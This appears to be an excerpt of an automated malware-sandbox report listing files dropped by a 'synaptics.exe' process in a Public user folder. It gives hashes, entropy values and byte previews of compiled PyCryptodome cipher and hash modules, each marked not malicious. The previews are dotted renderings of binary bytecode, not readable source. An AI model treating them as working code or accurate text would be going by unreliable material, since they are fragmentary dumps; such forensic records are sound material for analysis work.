                                                                                                                                                                                      SHA1:262E9D357D2D86622940A4CE23823ADAE6C78E54
                                                                                                                                                                                      SHA-256:A85E40EC4D65B7487BD20D4BBC8D8687E8A1F49B065B891929BF18C932ADE7E6
                                                                                                                                                                                      SHA-512:FE38F499CED762E2A99573F7F91AA54ED15B30901141066A30D933E4711F90EF17BA05F113A2992E4090BD6E6DCF1AE6E4B174E5EFEEF0CF2501C639C555682A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........fk........................@...s....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.e.e.e.e.e.e.d...Z.e.e.e.e.d...Z.d.d...Z.d.S.)......N)..._create_ecb_cipher)..._create_cbc_cipher)..._create_cfb_cipher)..._create_ofb_cipher)..._create_ctr_cipher)..._create_openpgp_cipher)..._create_ccm_cipher)..._create_eax_cipher)..._create_siv_cipher)..._create_gcm_cipher)..._create_ocb_cipher)....................................).....................c....................O...s....|.|.d.<.t.t...}.|...d.d...r.|...t.....|.|.v.r.t.d.....|.r^|.d.v.r2t.|...d.k.r+t.d.....|.d...|.d.<.n,|.d.v.rGt.|...d.k.r@t.d.....|.d...|.d.<.n.|.d.k.rVt.|...d.k.rUt.d.....n.|.d.k.r^t.d.....|.|...|.f.i.|.....S.).N..keyZ.add_aes_modesFz.Mode not supported).r....r....r....r....r....r....z Too many arguments for this moder......nonce).r....r....r....r....Z.IVr....z%IV is not meaningful for the ECB mode)...dict.._modes..pop..up
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7468
                                                                                                                                                                                      Entropy (8bit):5.1475211106994925
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:VY6kvwbQ9XIHJEgsA4nx3ZzhSLR5esIDGnt834mGvWcsQNqC/Y8HvGBt83425phX:FbJHrt4x3Zu8smGtU4w1MGnU44Kt0qOp
                                                                                                                                                                                      MD5:F4163993E2D562EE1B316DE91636A055
                                                                                                                                                                                      SHA1:8116CFDBFE9BBDF873D0725C920845900FD14D2B
                                                                                                                                                                                      SHA-256:10D7E26829732707757FE6054BFE61613E37B511D9108BDF1601E175BE4FA12B
                                                                                                                                                                                      SHA-512:9E3668810F9EC6BBC9F6BFEFA36AFDA516A4895894F2B3ED63143B3E58FBA6628BCA552858C6E1FE93845D5C7DC225410AD174D5B132B9A8A8F7683EC55E171A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.+.......................@...sp...d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).z'.Ciphertext Block Chaining (CBC) mode....CbcMode.....)..._copy_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytesz.Crypto.Cipher._raw_cbca..... int CBC_start_operation(void *cipher,. const uint8_t iv[],. size_t iv_len,. void **pResult);. int CBC_encrypt(void *cbcState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int CBC_decrypt(void *cbcState,. const uint8_t *in,. uint8_t *out,.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):17943
                                                                                                                                                                                      Entropy (8bit):5.290121028324049
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:gLq/qgUMlQiMS1I48juzC8Y2tMlx7vXyqE:gLSQM6jQMb7/yV
                                                                                                                                                                                      MD5:9972D408002D5CC458330B0D1DB08E0A
                                                                                                                                                                                      SHA1:5DD47EBD486F060247250E49ACD891A6828B5656
                                                                                                                                                                                      SHA-256:B294EF910B72E281F70FE60676A2AEC6172DFE8DF79E9A4AB860A6A98C0E92BE
                                                                                                                                                                                      SHA-512:B31A85BEDEA1AB04B190CF069678202674EC672712507EEBD8096AA9829E559972E455CED96D665D3FD8C224AF999A1A102E146027327CA6DE3323DDC81274C0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.a.......................@...s....d.Z.d.g.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d...Z.e.d.d.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).z".Counter with CBC-MAC (CCM) mode....CcmMode.....N)...unhexlify)...byte_string..bord.._copy_bytes)...is_writeable_buffer)...strxor)...long_to_bytes)...BLAKE2s)...get_random_bytesc....................K...s....t.d.d.|...S.).N..Enum..)...type).Z.enumsr....r.....IC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\Cipher\_mode_ccm.py..enum3...s......r..............)...NOT_STARTED..PROCESSING_AUTH_DATA..PROCESSING_PLAINTEXTc....................@...s....e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d.d...Z.d!d.d...Z.d!d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d!d.d...Z.d!d.d...Z.d.S.)"r....a....Counter with CBC-MAC (CCM)... This is an Authenticated Encryption with Associated Data (`AEAD`_) mode.. It provides both confidentiality and authenticity... The header of the mes
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7790
                                                                                                                                                                                      Entropy (8bit):5.11088623490323
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:uo6kvf/G8HDxEpuPnxEZYhPPsCIgGGt834mGPMsQNPx/g8H+G0t834U5pptYCcXn:d3xEuxEZnCJGkU4ma5GaU4mx4DbKq+E
                                                                                                                                                                                      MD5:01B4280963587A1A5043B3C798C40F51
                                                                                                                                                                                      SHA1:3E7F6AC381BF0CA9508A4374B1ABAB9AF4523FED
                                                                                                                                                                                      SHA-256:3445010A08E709B2C1267C8A21B5B7067884011DC62D16782C872CA738845717
                                                                                                                                                                                      SHA-512:452035908A9E65AC80EDE2DFE073C293B9E42090C1E265C12ECC79926FA99F93EA8C75D032DC5158D6F58D23B895858595DDFDFEFC96070B3160B679213EECA7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.+.......................@...sp...d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).z..Counter Feedback (CFB) mode....CfbMode.....)..._copy_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytesz.Crypto.Cipher._raw_cfba .... int CFB_start_operation(void *cipher,. const uint8_t iv[],. size_t iv_len,. size_t segment_len, /* In bytes */. void **pResult);. int CFB_encrypt(void *cfbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int CFB_decrypt(void *cfbState,.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10988
                                                                                                                                                                                      Entropy (8bit):5.105679246344849
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:m7GD6nkH7cxiM16TPyl8ssmGrPU4uOGrNU4XrwSkcji+Gb:mamnGSQ480MTuOyTXMSkmi+0
                                                                                                                                                                                      MD5:DA8EB714469ECE7F3621F3D57F009084
                                                                                                                                                                                      SHA1:7EBDFEE41E407C10D7B9D62001CBBEB38EC4F2C4
                                                                                                                                                                                      SHA-256:88D163F0ADF8A879757C4D3EED96B86BB7C4130394BA641005642E2D7131876D
                                                                                                                                                                                      SHA-512:8A94C12ED6B737C83F7A9C82FDC4E1E47ADE5B80589591EF970858E574F719EB36548FCA553283FEDCAF7DB70900036201529916ABAC6BAC0210B63A12124B07
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........fM?.......................@...s....d.Z.d.g.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).z..Counter (CTR) mode....CtrMode.....N)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytes)..._copy_bytes..is_native_int)...long_to_bytesz.Crypto.Cipher._raw_ctra..... int CTR_start_operation(void *cipher,. uint8_t initialCounterBlock[],. size_t initialCounterBlock_len,. size_t prefix_len,. unsigned counter_len,. unsigned littleEndian,. void **pResult);. int CTR_encrypt(void *ctrState,.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):12274
                                                                                                                                                                                      Entropy (8bit):5.163707800228712
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:BsVawXqNRGq1vCM4PBrU4/4DwU4X3Rz/AfrRWDL/773uewFjp3xWmk1:GawXq/F4M4lTwwTXp/AVeLT732L071
                                                                                                                                                                                      MD5:0D25E542E979894286196F8A798A823A
                                                                                                                                                                                      SHA1:22F237094A8D2CDE34164A5CEAEC3539EC429A75
                                                                                                                                                                                      SHA-256:9BBDBDAAFEAD22489531D0992A69FFB8A05BCD2AD930256123458691B5EBFF5C
                                                                                                                                                                                      SHA-512:7E67A31A475F459617B604B468E351A3947468B1BD83BD33945C7A21FC5DC1B0D3294A0D1655F3B3614E6427C53BD032DC5DF8457CE8DA2DD4378D5550D01100
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.:.......................@...s....d.Z.d.g.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.d.d...Z.d.S.).z..EAX mode....EaxMode.....N)...unhexlify)...byte_string..bord.._copy_bytes)...is_buffer)...strxor)...long_to_bytes..bytes_to_long)...CMAC..BLAKE2s)...get_random_bytesc....................@...sh...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.).r....a....*EAX* mode... This is an Authenticated Encryption with Associated Data. (`AEAD`_) mode. It provides both confidentiality and authenticity... The header of the message may be left in the clear, if needed,. and it will still be subject to authentication... The decryption step tells the receiver if the message comes. from a source that really knowns the secret key.. Additionally, decryption detects if any part of the message -. including the header - has been modified
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5817
                                                                                                                                                                                      Entropy (8bit):5.104392543295395
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:cFv6kvV9AtXEHlhfKx7lhL3FeaqBP6sQLRdJ98HJm3qc5pHIeOD:cH9pHlhM7lekL96mxsD
                                                                                                                                                                                      MD5:6D5591F049D697294B55A501D41C01A1
                                                                                                                                                                                      SHA1:5CA2E2706EE0227E234C651D770B35ADA3A06318
                                                                                                                                                                                      SHA-256:78FD5F9D687F7859A88B674DBABC0E7ECEE057E3ADC5F359EF0AE8518088759C
                                                                                                                                                                                      SHA-512:95A24978F775A3B8282A8E3D52F99D4186F53C53301C3332F5645CC9A131EE5CEB1B4E71FD14BC12E33766EE6DE7016268A53D19E0F783FEE41FDFFE4A131F20
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........fQ!.......................@...sX...d.Z.d.g.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).z".Electronic Code Book (ECB) mode....EcbMode.....)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_bufferz.Crypto.Cipher._raw_ecbak.... int ECB_start_operation(void *cipher,. void **pResult);. int ECB_encrypt(void *ecbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int ECB_decrypt(void *ecbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int ECB_stop_operation(void *state);. c....................@...s,.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):17071
                                                                                                                                                                                      Entropy (8bit):5.335286444215697
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:Pt+RW9/ScqbkrPM4JjaTlTbIl67Wa+7l9A:Pkw9/Zw4c7Fc9A
                                                                                                                                                                                      MD5:4FC27A4177BA77D149109E9368E9D36E
                                                                                                                                                                                      SHA1:A7042065F8FA050B13665FDA19B5447EC7686AC6
                                                                                                                                                                                      SHA-256:910B9ADB8B60D6C2A5BBD27D67DA46E2514C0BE4DFAD40066683979A4B62F8A1
                                                                                                                                                                                      SHA-512:AD190FC141575D2059D485B3ED8D312FAB21F7319D3DB03662C31F4D468C832D5D4740AE048816214A5D3B906522FC5BE507B1B26DF2FA0BC86C0CA79A9D6961
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.U.......................@...s....d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.d.d...Z.d.d...Z.e...Z.d.d...Z.e...Z.G.d.d...d.e...Z d.d...Z!e!d.d.d...Z"G.d.d...d.e...Z#d.d...Z$d.S.).z..Galois/Counter Mode (GCM)....GcmMode.....)...unhexlify)...bord.._copy_bytes)...is_buffer)...long_to_bytes..bytes_to_long)...BLAKE2s)...get_random_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr)..._cpu_featuresa`.... int ghash_%imp%(uint8_t y_out[16],. const uint8_t block_data[],. size_t len,. const uint8_t y_in[16],. const void *exp_key);. int ghash_expand_%imp%(const uint8_t h[16],. void **ghash_tables);. int ghash_destroy_%imp%(void *ghash_tables);.c........................sl...d.d.l.m.}...d.}.|.d.|...}.z.....f.d
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):14653
                                                                                                                                                                                      Entropy (8bit):5.242538988513641
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:SqHGdezRbrM0R4K/eWAe4hvDCxH5DBbaZ0dQ:SsGdeZMMF2ygOZ5aZ0dQ
                                                                                                                                                                                      MD5:64BA6D52F739BAE2537D83C37B9C7C3D
                                                                                                                                                                                      SHA1:31DE522E71314D4D085C341B86E7DA6BF31CB21B
                                                                                                                                                                                      SHA-256:7EA3229D6D4B4D1860C6C004FD20195E3BFA876670408FA44D703F155FD91DC7
                                                                                                                                                                                      SHA-512:D9814DF69C267462BB5BFA4A1C8B13691CD010B1D46BEFF29A9B037BC69A425F268E2D234BC3DB06CD3AF70903A1462F3013ABD7589A49241C7B5FE7709D1E3A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.O.......................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).ah....Offset Codebook (OCB) mode...OCB is Authenticated Encryption with Associated Data (AEAD) cipher mode.designed by Prof. Phillip Rogaway and specified in `RFC7253`_...The algorithm provides both authenticity and privacy, it is very efficient,.it uses only one key and it can be used in online mode (so that encryption.or decryption can start before the end of the message is available)...This module implements the third and last variant of OCB (OCB3) and it only.works in combination with a 128-bit block symmetric cipher, like AES...OCB is patented in US but `free licenses`_ exist for software implementations.meant for non-military purposes...Example:. >>> from Crypto.Cipher import AES. >>> from Crypto.Random import get_random_bytes. >>>. >>> key = get_ran
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7359
                                                                                                                                                                                      Entropy (8bit):5.087305523269934
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:qA6kv9jQvHHq12nxIN3hSLA5esIUGGt834mGPMsQN7t/z8HaGTvt834+5pcRJ6Xn:dyHqAxId8s9GkU4yZlGTVU4JCoq/1l
                                                                                                                                                                                      MD5:6FC6FFA8BC7E3BFE1D24B13AB76BD235
                                                                                                                                                                                      SHA1:7162D9046E6B98CBB9CCC243022D808BFF63A4C3
                                                                                                                                                                                      SHA-256:AAE4286AFD12F79B723CBF7F3C0A38FE4F0D5C04730160F93FB77E595B94283B
                                                                                                                                                                                      SHA-512:A2AA2AB7CC5C190DBEBE8BD764D9C750EEC70498AA011CCD571563ACDB2A0804D4A612A31179C05D2D2335071D6A07254FCF43BB65ECA4247B306B892EEE4CA6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.(.......................@...sp...d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).z..Output Feedback (CFB) mode....OfbMode.....)..._copy_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytesz.Crypto.Cipher._raw_ofba..... int OFB_start_operation(void *cipher,. const uint8_t iv[],. size_t iv_len,. void **pResult);. int OFB_encrypt(void *ofbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int OFB_decrypt(void *ofbState,. const uint8
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4815
                                                                                                                                                                                      Entropy (8bit):5.238106852194177
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:RV8N+A+Xkyi2Kt834mGPUGt8340y9nxBX4o7UIDFI:RU+A+5YU44kU4H9xxUIZI
                                                                                                                                                                                      MD5:1E6D4322F828C3148DC645AC02283896
                                                                                                                                                                                      SHA1:C18EB349C6F29D0B32FC460BE47C45B311A5AAA0
                                                                                                                                                                                      SHA-256:98EE5257E14919D3641CEEB06C4A7AA51F0772605D75EB82A9FE98D044300E61
                                                                                                                                                                                      SHA-512:D92314DDB4C22D4540FE21B7AA87C0E5DEC926DD99CD38B05A4C0E9EA130EDCCF462CDDEE8333E5F4546B92BF34A7A0C9D4D20727E914F7F7F343C3661A70100
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f[........................@...s>...d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.d.d...Z.d.S.).z..OpenPGP mode....OpenPgpMode.....)..._copy_bytes)...get_random_bytesc....................@...s(...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.S.).r....az...OpenPGP mode... This mode is a variant of CFB, and it is only used in PGP and. OpenPGP_ applications. If in doubt, use another mode... An Initialization Vector (*IV*) is required... Unlike CFB, the *encrypted* IV (not the IV itself) is. transmitted to the receiver... The IV is a random data block. For legacy reasons, two of its bytes are. duplicated to act as a checksum for the correctness of the key, which is now. known to be insecure and is ignored. The encrypted IV is therefore 2 bytes. longer than the clean IV... .. _OpenPGP: http://tools.ietf.org/html/rfc4880.. :undocumented: __init__. c....................C...s....|.j.|._.d.|._.|.j.|.|.j.f.d.|.j...|.j.d...d...|.....}.t.d.d.|...}.t.|...|.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11816
                                                                                                                                                                                      Entropy (8bit):5.250366910481593
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:pLqjzBGjN4xYIBKXrEApsGdDGdkT+WIp6hW97iuA4al45B3xQrBBQ:tq45XIBarEWfYiIpAe7JaG81m
                                                                                                                                                                                      MD5:EC6CFE1ACDC8B91ADCD9C033ECAEAE8B
                                                                                                                                                                                      SHA1:6AEE1E3D747BBA37D9C3A0D8649C5048AE9EDD88
                                                                                                                                                                                      SHA-256:357DABFACCD7A90A7062408B64A2F25ACE15030255CC9C3E8DCDAE7CAF396E30
                                                                                                                                                                                      SHA-512:2E43420ADBCB2493C6D7EC790A5523CB3D9B44BFD03F203FA40913322EE745E6DD83341ADB95DCE9CA8DEC3B63ECBF3B8E8BD1504CB0480954AEE6867380BF17
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f!8.......................@...s....d.Z.d.g.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.d.d...Z.d.S.).z-.Synthetic Initialization Vector (SIV) mode....SivMode.....)...hexlify..unhexlify)...bord.._copy_bytes)...is_buffer)...long_to_bytes..bytes_to_long)..._S2V)...BLAKE2s)...get_random_bytesc....................@...sl...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.).r....a....Synthetic Initialization Vector (SIV)... This is an Authenticated Encryption with Associated Data (`AEAD`_) mode.. It provides both confidentiality and authenticity... The header of the message may be left in the clear, if needed, and it will. still be subject to authentication. The decryption step tells the receiver. if the message comes from a source that really knowns the secret key.. Additionally, decryption detects if any part of the message - including
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1528
                                                                                                                                                                                      Entropy (8bit):4.645410861092278
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:mKD8osetp6ePCXjDRy2NjKKJwABGhxmZk5F5186hnnj5Mwj:mKwosM6p1uV860wj
                                                                                                                                                                                      MD5:775ECC4F4EE06A17DD571D8E0D85B23E
                                                                                                                                                                                      SHA1:C69DAA752AD762B85D6520C4E7278607BB02AD9C
                                                                                                                                                                                      SHA-256:FFCB843B67D41D0D6DE61A84FF21EA430B1994305609EC7819AB5AFF50EB512D
                                                                                                                                                                                      SHA-512:F426374C2838C2D7655BDC76174C36A7709A4CC05B39E22A540BA07B853CD14161C5926C36A8EB40B40D9568F838E17393EF6AA5E0D06C7773AE5355000487ED
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........fI........................@...s2...d.d.l.m.Z.m.Z.m.Z...e.d.d...Z.d.d...Z.d.d...Z.d.S.)......)...load_pycryptodome_raw_lib..c_size_t..c_uint8_ptrz.Crypto.Cipher._pkcs1_decodea..... int pkcs1_decode(const uint8_t *em, size_t len_em,. const uint8_t *sentinel, size_t len_sentinel,. size_t expected_pt_len,. uint8_t *output);.. int oaep_decode(const uint8_t *em,. size_t em_len,. const uint8_t *lHash,. size_t hLen,. const uint8_t *db,. size_t db_len);. c....................C...sP...t.|...t.|...k.r.t.d.....t...t.|...t.t.|.....t.|...t.t.|.....t.|...t.|.....}.|.S.).Nz.Incorrect output length)...len..ValueErr
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7296
                                                                                                                                                                                      Entropy (8bit):5.2592275358789
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:Pvykv8y2Ed5cPnd8Vr+jnH02x8yC0enZH3i2Ms+dlFKyXcfT7b2k1hITnSHWalQ7:cyC8N+n8yC0rsePJXOz29S7QGLm
                                                                                                                                                                                      MD5:95F8E2BC98EC330E708BC8C5A16B7640
                                                                                                                                                                                      SHA1:0B37DC5E3F10F7811D992490C32BD399944698E7
                                                                                                                                                                                      SHA-256:4E2572840DADCE022792A88CB93A0C494A37586ED52587AE95C5F44DD0CD5622
                                                                                                                                                                                      SHA-512:44FF2E8908E5D732B0E77F6607492B36B8A94745267B3C45A7D2F49501024B7C3023F9B1B8D00C000505ADB1DDA758E97001DD03B9F2E5FBA0F3AA14DC9F9103
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.%.......................@...sr...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.)......)...unhexlify)...bord..tobytes)...get_random_bytes)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptrz.Crypto.Hash._BLAKE2sa..... int blake2s_init(void **state,. const uint8_t *key,. size_t key_size,. size_t digest_size);. int blake2s_destroy(void *state);. int blake2s_update(void *state,. const uint8_t *buf,. size_t len);. int blake2s_digest(const void *state,. uint8_t digest[32]);. int blake2s_copy(co
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7926
                                                                                                                                                                                      Entropy (8bit):5.384259307905337
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:xkzUGdR3AHmrFQCkRU3hoM2wis+jpxKmWBKskH3Pj:OzUGPQHmrFQJRUCM2wiZdxzPzXPj
                                                                                                                                                                                      MD5:959AEAF60AF2782B86D39472430AC396
                                                                                                                                                                                      SHA1:D7D28AC344BC3C7D490F633543AA1572F59E02B5
                                                                                                                                                                                      SHA-256:0A6EC7D6CA7734BFBF5A13B966D037D40E27839FB859722CA14649EA262F9C73
                                                                                                                                                                                      SHA-512:9F00F8ABEC214123D376A91BFB9AC25D0A1AEE4DE37FBC674C62A4F8FA36088B695E630678D6AB5D1011EDAF7AABD025DF82F5CED3813E95BDCEC74B25DC4FDE
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f:*.......................@...s....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.d.d.d...Z.G.d.d...d.e...Z.....d.d.d...Z.d.S.)......)...unhexlify)...BLAKE2s)...strxor)...long_to_bytes..bytes_to_long)...bord..tobytes.._copy_bytes)...get_random_bytesNc....................C...s,...t.|...d.>.|.A.}.t.|.t.|.....t.|.....d.....S.).N.....).r....r......len)...bsZ.xor_lsb..num..r.....BC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\Hash\CMAC.py.._shift_bytes$...s........r....c....................@...sT...e.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...CMACz.A CMAC hash object.. Do not instantiate directly. Use the :func:`new` function... :ivar digest_size: the size in bytes of the resulting MAC tag. :vartype digest_size: integer. Nc....................C...sD...|.|._.t.d.d.|...|._.|.|._.|.|._.|.j...|._.}.d.|._.|.|._.|.d.k.r&d.}.d.|._.n.|.d.k.r0d.}.d.|._.n.t.d.|.......d.|...}.|.j.|.|.j.f.i
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
